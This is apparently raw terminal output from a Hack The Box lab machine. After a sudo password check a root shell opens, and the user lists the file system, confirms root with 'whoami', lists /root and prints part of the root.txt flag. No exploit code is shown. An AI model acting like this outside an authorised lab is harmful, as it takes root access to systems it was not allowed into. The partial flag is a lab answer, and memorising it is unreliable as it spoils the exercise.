Validating sudo...
Please enter the administrative password: 
 
Both passwords verified. Executing the command...
/bin/sh: 0: can't access tty; job control turned off
# ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
# whoami
root

# cd /root
# ls
# HTB
audit__.sh
coredns
dns.sh
helm
iptables_rules.sh
kubeseal
phpcgi
python
root.txt
wordpress
cat root.txt
6470305f...